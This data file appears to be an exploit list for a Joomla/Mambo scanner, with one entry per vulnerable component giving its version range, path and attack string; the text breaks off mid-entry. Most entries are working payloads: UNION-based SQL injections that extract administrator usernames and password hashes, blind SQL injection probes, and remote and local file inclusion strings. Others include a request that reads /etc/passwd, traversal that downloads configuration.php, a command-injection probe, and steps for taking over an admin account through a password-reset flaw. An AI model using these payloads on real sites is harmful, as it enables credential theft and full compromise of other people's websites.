mosListMessenger Versions effected: 2.1.0 and older|/components/com_lm/|N/A Webring File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_webring/|/components/com_webring/admin.webring.docs.php?component_dir= Joomla! 12Pictures File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_joom12pic/|/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= FlashFun Versions effected: 1.0 and older|/components/com_flashfun/|N/A NeoRecruit SQL Injection Vulnerability Versions effected: 1.4.0 and older|/components/com_neorecruit/|/index.php?option=com_neorecruit&task=offer_view&id=option=com_neorecruit&task=offer_view&id=99999999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- MosReporter File Inclusion Vulnerability Versions effected: 0.9.3 and older|/components/com_reporter/processor/reporter.sql.php|/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path= Joomla Flash Fun! File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_joomlaflashfun/|/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= mosDirectory SQL Injection Vulnerability Versions effected: 2.3.2 and older|/components/com_directory/|/index.php?option=com_directory&page=viewcat&catid=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- PU Arcade SQL Injection Vulnerability Versions effected: 2.1.3 Beta and older|/components/com_puarcade/|/index.php?option=com_puarcade&Itemid=92&fid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- RSGallery SQL Injection Vulnerability Versions effected: 2.0 beta 5 and older|/components/com_rsgallery/|/index.php?option=com_rsgallery&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- JUser File Inclusion Vulnerability Versions effected: 1.0.14 and older|/components/com_juser/|/components/com_juser/xajax_functions.php?mosConfig_absolute_path= Carousel Flash Image Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_jjgallery/|/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= Color Lab File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_colorlab/|/components/com_color/admin.color.php?mosConfig_live_site= Joomla Flash Uploader File Inclusion Vulnerability Versions effected: 2.5.2 and older|/components/com_joomla_flash_uploader/|/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path= JContentSubscription File Inclusion Vulnerability Versions effected: 1.5.8 and older|/components/com_jcs/|/components/com_jcs/jcs.function.php?mosConfig_absolute_path= Mp3 Allopass File Inclusion Vulnerability Versions effected: 1.0 and older|/components/com_mp3_allopass/|/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site= Joomla Remote Admin Password Change Versions Affected: 1.5.5 <=|/components/com_user/controller.php|1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password Joomla Component (xsstream-dm) Remote SQL Injection|/components/com_xsstream-dm/|/index.php?option=com_xsstream-dm&Itemid=69&movie=-1/**/union/**/select/**/1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Joomla Component (biblestudy) Remote SQL Injection|/components/com_biblestudy/|/index.php?option=com_biblestudy&view=mediaplayer&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_eventlist SQL Injection Vulnerability Versions Affected: N/A|/components/com_eventlist/|/index.php?option=com_eventlist&func=details&did=9999999999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- jabode - Remote SQL injection Version Affected: N/A|/components/com_jabode/|/index.php?option=com_jabode&task=sign&sign=taurus&id=-2+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- netinvoice Remote SQL injection Version Affected: N/A|/components/com_netinvoice/|/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- beamospetition Remote SQL injection Version Affected: N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&pet=-5+UNION+SELECT+1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- prayercenter Remote SQL injection Version Affected: N/A|/components/com_prayercenter/|/index2.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_webhosting Blind SQL Injection Version Affected: N/A|/components/com_webhosting/|/index.php?option=com_webhosting&catid=1+and+substring(@@version,1,1)=5::/index.php?option=com_webhosting&catid=1+and+substring(@@version,1,1)=6 com_datsogallery Blind SQL Injection Exploit Version Affected: 1.6 or lower|/components/com_datsogallery/|Fill useragent string with 15754'),(1,if(ascii(substring((select password from #__users where username='admin'),0,1))>58,(select 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'),(select link from #__menu)))/* com_artist Remote SQL injection Version Affected: N/A|/components/com_artist/|/index.php?option=com_artist&idgalery=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_mycontent Blind SQL Injection Version Affected: N/A|/components/com_mycontent/|/index.php?option=com_mycontent&task=view&id=10+and+substring(@@version,1,1)=5::/index.php?option=com_mycontent&task=view&id=10+and+substring(@@version,1,1)=6 Joo!BB Blind SQL Injection Exploit Version Affected: 0.5.9 or lower|/components/com_joobb/|/index.php?option=com_joobb&view=forum&forum=1+and+substring(@@version,1,1)=5::/index.php?option=com_joobb&view=forum&forum=1+and+substring(@@version,1,1)=6 Joomla Component acctexp Blind SQL Injection Vulnerability Version Affected: <= 0.12|/components/com_acctexp/|/index.php?option=com_acctexp&task=subscribe&usage=+and+substring(@@version,1,1)=5::/index.php?option=com_acctexp&task=subscribe&usage=+and+substring(@@version,1,1)=6 joomradio Remote SQL Injection Version Affected: <= 1.0 |/components/com_joomradio/|/index.php?option=com_joomradio&page=show_video&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_equotes Remote SQL injection Version Affected: 0.95 <=|/components/com_equotes/|/index.php?option=com_equotes&id=13+and+1=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_idoblog Remote SQL Injection Version Affected: b24 <=|/components/com_idoblog/|/index.php?option=com_idoblog&task=userblog&userid=42+and+1=1+UNION+SELECT+1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component JooBlog Blind SQL Injection Exploit Version Affected: 0.1.1 <=|/components/com_jb2/|/index.php?option=com_jb2&view=category&CategoryID=1+and+substring(@@version,1,1)=5::/index.php?option=com_jb2&view=category&CategoryID=1+and+substring(@@version,1,1)=6 Component jotloader Blind SQL Injection Exploit Version Affected: 1.2.1.a <=|/components/com_jotloader/|/index.php?option=com_jotloader&cid=1+and+substring(@@version,1,1)=5::/index.php?option=com_jotloader&cid=1+and+substring(@@version,1,1)=6 EasyBook SQL Injection Exploit Version Affected: 1.1 <=|/components/com_easybook/|/index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- joomladate Remote SQL injection Version Affected: N/A|/components/com_joomladate/ |/index.php?option=com_joomladate&task=viewProfile&user=9999999+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component GameQ Remote SQL injection Version Affected: 4.0 <=|/components/com_game/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- n-forms Blind SQL Injection Exploit Version Affected: 1.01 <=|/components/com_n-forms/|/index.php?option=com_n-forms&form_id=1+and+substring(@@version,1,1)=5::/index.php?option=com_n-forms&form_id=1+and+substring(@@version,1,1)=6 yvcomment Blind SQL Injection Exploit Version Affected: 1.16 <=|/components/com_yvcomment/|/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+substring(@@version,1,1)=5::/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+substring(@@version,1,1)=6 News Portal Blind SQL Injection Exploit Version Affected: 1.0 <=|/components/com_news_portal/|/index.php?option=com_news_portal&Itemid=1+and+substring(@@version,1,1)=5::/index.php?option=com_news_portal&Itemid=1+and+substring(@@version,1,1)=6 expshop Remote SQL injection Version Affected: N/A|/components/com_expshop/|/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Xe webtv Blind SQL Injection Exploit Version Affected: N/A|/components/com_xewebtv/|/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+substring(@@version,1,1)=5::/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+substring(@@version,1,1)=6 com_versioning (id) Remote Sql Injection Vulnerability Version Affected: 1.0.2 <=|/components/com_versioning /|/index.php?option=com_versioning&task=edit&id=-83+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- mygallery Remote SQL Injection Exploit Version Affected: N/A|/components/com_mygallery/|/index.php?option=com_mygallery&func=viewcategory&cid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component Brightcode Weblinks Remote SQL injection Version Affected: N/A|/component/com__brightweblinks/|/index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72-- Component QuickTime VR Remote SQL Injection Version Affected: 1.0 <=|/components/com_vr/|/index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- is_com Multiple Remote SQL Injection Version Affected: 1.0.1 <=|/components/com_is/|/index.php?option=com_is&task=motor&motor=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- altas multiple SQL Injection Version Affected: 1.0 <=|/components/com_altas/|/index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_dbquery Remote file Inclusion Version Affected: 1.4.1.1 <=|/components/com_dbquery/|/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path= com_content SQL Injection Vulnerability Version Affected: 1.0.0 <=|/components/com_content/|/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- ionFiles com_ionfiles Arbitrary File Download Vulnerability Version Affected: 4.4.2 <= |/components/com_ionfiles/|/components/com_ionfiles/download.php?file=../../configuration.php&download=1 Component DT Remote SQL Injection Exploit Version Affected: N/A|/components/com_dtregister/|/index.php?option=com_dtregister&eventId=-12+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72&task=pay_options&Itemid=138 com_ezstore Blind SQL Injection Exploit Version Affected: N/A|/components/com_ezstore/|/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+substring(@@version,1,1)=5::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+substring(@@version,1,1)=6 Joomla Imagebrowser Directory Tranversal Vulnerability Version Affected: 0.1.5 RC2 <=|/components/remository/|/index.php?option=com_imagebrowser&folder=../../../../_non_ com_hotspots Remote SQL Injection Exploit Version Affected: N/A|/components/com_hotspots/|/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_joomtracker Remote SQL Injection Exploit Version Affected: 1.0.1 <=|/components/com_joomtracker/|/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* +where+usertype=0x53757065722041646d696e6973747261746f72 Component Ignite Remote SQL Injection Exploit Version Affected: 0.8.3 <=|/components/com_ignitegallery/|/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=18 Component Mad4Joomla Mailforms Remote SQL Injection Exploit Version Affected: N/A|/components/com_mad4joomla/|/index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component Ownbiblio (com_ownbiblio) Remote SQL Injection Exploit Version Affected: 1.5.3 <=|/components/com_ownbiblio/|/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Daily Message (com_dailymessage) Remote SQL Injection Exploit Version Affected: 1.0.3 <=|/components/com_dailymessage/|/index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_ds-syndicate Remote SQL Injection Exploit Version Affected: N/A|/components/com_ds-syndicate/|/index.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_thyme Remote SQL Injection Exploit Version Affected: 1.0 <=|/components/com_thyme/|/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component Archaic Binary Gallery Directory Traversal Vulnerability Version Affected: 1.0 <=|/components/com_ab_gallery/|/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../ Component Kbase (com_kbase) Remote SQL Injection Exploit Version Affected: 1.2 <=|/components/com_kbase/|/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Flash Tree Gallery(com_treeg) Remote File Inclusion Vulnerability Version Affected: 1.0 <=|/components/com_treeg/|/components/com_treeg/admin.treeg.php?mosConfig_live_site= VirtueMart Google Base Component (com_googlebase) Remote File Inclusion Vulnerability Version Affected: 1.1 <=|/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path= com_ongumatimesheet20 Beta Remote File Inclusion Vulnerability Version Affected: 4 <=|/components/com_ongumatimesheet20/|/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path= Joomla Component ProDesk (com_pro_desk) Local File Inclusion Vulnerability Version Affected: 1.2 <=|/components/com_pro_desk/|/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd Clickheat - Heatmap stats for Joomla! Multiple Remote File Inclusion Vulnerabilities Version Affected: 1.0.1 <=|/components/com_clickheat/|/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]= People Book File Inclusion Vulnerability Versions effected: 1.1.5 and older|/admin/components/com_peoplebook/param.peoplebook.php|/admin/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= Mambo eMail Publisher File Inclusion Vulnerability Versions effected: 1.2 and older|/admin/components/com_mmp/help.mmp.php|/admin/components/com_mmp/help.mmp.php?mosConfig_absolute_path= Dada Mail Manager Component Remote File Inclusion Vulnerability Version Affected: 2.6 <=|/components/com_dadamail/|/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]= Recly!Competitions Component Multiple Remote File Inclusion Vulnerability Version Affected: 1.0.0 <=|/components/com_competitions/|/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path= People Book File Inclusion Vulnerability Versions effected: 1.1.5 and older|/administrator/components/com_peoplebook/param.peoplebook.php|/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= Feederator - RSS manager Component Multiple Remote File Inclusion Vulnerabilities Version Affected: 1.0.5 <=|/components/com_recly/|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode] /components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode] /components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode] /components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path= Joomla com_books(book_id) Remote SQL Injection Exploit Version Affected: <=|/components/com_books/|/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Joomla & Mambo com_catalogproduction (id) Remote SQL Injection Exploit Version Affected: N/A |/components/com_catalogproduction/|/index.php?option=com_catalogproduction&task=viewdetail&id=-9999+union+all+select+1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Simple RSS Reader Component Remote File Inclusion Vulnerability Version Affected: 1.0 <=|/components/com_rssreader/|/components/com_rssreader/admin.rssreader.php?mosConfig_live_site= Hot Property Version Affected: 0.97 <=|/components/com_hotproperties/|N/A com_search Remote Code Execution Exploit Version Affected: 1.5 beta 2 <=|/components/com_search/|/index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B%23 com_contactinfo(catid) Remote SQL Injection Exploit Version Affected: N/A|/components/com_contactinfo/|/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--/* A6MamboCredits File Inclusion Vulnerability Versions effected: Any|/administrator/components/com_a6mambocredits/|/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= A6MamboCredits File Inclusion Vulnerability Versions effected: Any|/admin/components/com_a6mambocredits/|/admin/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0 <=|/admin/components/com_comprofiler/plugin.class.php|/admin/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= A6MamboHelpDesk File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_a6mambohelpdesk/|/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= A6MamboHelpDesk File Inclusion Vulnerability Versions effected: Any Version|/admin/components/com_a6mambohelpdesk/|/admin/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= Colophon File Inclusion Vulnerability Versions effected: 1.2 and older|/administrator/components/com_colophon/|/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= Colophon File Inclusion Vulnerability Versions effected: 1.2 and older|/admin/components/com_colophon/|/admin/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0 <=|/administrator/components/com_comprofiler/plugin.class.php|/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= MambelFish File Inclusion Vulnerability Versions effected: 1.x and older|/administrator/components/com_mambelfish/|/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path= MambelFish File Inclusion Vulnerability Versions effected: 1.x and older|/admin/components/com_mambelfish/|/admin/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path= Com Profiler Blind SQL Injection Versions effected: 1.0 RC2 and older|/administrator/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=5::/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=6 Com Profiler Blind SQL Injection Versions effected: 1.0 RC2 and older|/admin/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=5::/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=6 User Home Pages 2 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/administrator/components/com_uhp2/|/administrator/components/com_uhp2/uhp_config.php?mosConfig_absolute_path= User Home Pages 2 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/admin/administrator/components/com_uhp2/|/admin/components/com_uhp2/uhp_config.php?mosConfig_absolute_path= User Home Pages 1 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/administrator/components/com_uhp/|/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= User Home Pages 1 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/admin/components/com_uhp/|/admin/components/com_uhp/uhp_config.php?mosConfig_absolute_path= Bayesian Naive Filter File Inclusion Vulnerability Versions effected: 1.1 and older|/administrator/components/com_bayesiannaivefilter/|/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= Bayesian Naive Filter File Inclusion Vulnerability Versions effected: 1.1 and older|/admin/components/com_bayesiannaivefilter/|/admin/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= Webring File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_webring/|/administrator/components/com_webring/admin.webring.docs.php?component_dir= Webring File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_webring/|/admin/components/com_webring/admin.webring.docs.php?component_dir= JIM File Inclusion Vulnerability Versions effected: 1.0.1 and older|/administrator/components/com_jim/|/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path= JIM File Inclusion Vulnerability Versions effected: 1.0.1 and older|/admin/components/com_jim/|/admin/components/com_jim/install.jim.php?mosConfig_absolute_path= Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_mgm/|/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions effected: Any Version|/admin/components/com_mgm/|/admin/components/com_mgm/help.mgm.php?mosConfig_absolute_path= Link Directory File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_linkdirectory/|/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= Link Directory File Inclusion Vulnerability Versions effected: Any Version|/admin/components/com_linkdirectory/|/admin/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= Kochsuite File Inclusion Vulnerability Versions effected: 0.9.4 and older|/administrator/components/com_kochsuite /|/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= Kochsuite File Inclusion Vulnerability Versions effected: 0.9.4 and older|/admin/components/com_kochsuite /|/admin/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= SWmenu File Inclusion Vulnerability Versions effected: 4.0 and older|/administrator/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= SWmenu File Inclusion Vulnerability Versions effected: 4.0 and older|/admin/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= JoomlaPack File Inclusion Vulnerability Versions effected: 1.0.4a2 RE and older|/administrator/components/com_jpack/|/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path= JoomlaPack File Inclusion Vulnerability Versions effected: 1.0.4a2 RE and older|/admin/components/com_jpack/|/admin/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path= PCL Library File Inclusion Vulnerability Versions Affected: N/A|/libraries/pcl/|/libraries/pcl/pcltar.php?g_pcltar_lib_dir= Joomla Radio 5 File Inclusion Vulnerability Versions effected: 5.0 and older|/administrator/components/com_joomlaradiov5/|/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= Joomla Radio 5 File Inclusion Vulnerability Versions effected: 5.0 and older|/admin/components/com_joomlaradiov5/|/admin/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= Joomla Flash Fun! File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_joomlaflashfun/|/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= Joomla Flash Fun! Versions effected: 1.0 and older|/admin/components/com_joomlaflashfun/|/admin/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= Module mod_pxt File Inclusion Vulnerability Versions Affected: N/A |/modules/mod_pxt/|/modules/mod_pxt/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]= JContentSubscription File Inclusion Vulnerability Versions effected: 1.5.8 and older|/administrator/components/com_jcs/|/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= JContentSubscription File Inclusion Vulnerability Versions effected: 1.5.8 and older|/admin/components/com_jcs/|/admin/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path= Joomla Flash Uploader File Inclusion Vulnerability Versions effected: 2.5.2 and older|/administrator/components/com_joomla_flash_uploader/|/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path= MosMedia File Inclusion Vulnerability Versions effected: 1.0.8 and older|/administrator/components/com_mosmedia/|/administrator/components/com_mosmedia/media.tab.php?mosConfig_absolute_path= MosMedia File Inclusion Vulnerability Versions effected: 1.0.8 and older|/admin/components/com_mosmedia/|/admin/components/com_mosmedia/media.tab.php?mosConfig_absolute_path= WmT Advanced Flash Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_wmtgallery/|/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site= WmT Advanced Flash Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_wmtgallery/|/admin/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site= Webmaster Tips Portfolio File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path= Webmaster Tips Portfolio File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_wmtportfolio/|/admin/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path= Joomla Flash Uploader File Inclusion Vulnerability Versions effected: 2.5.2 and 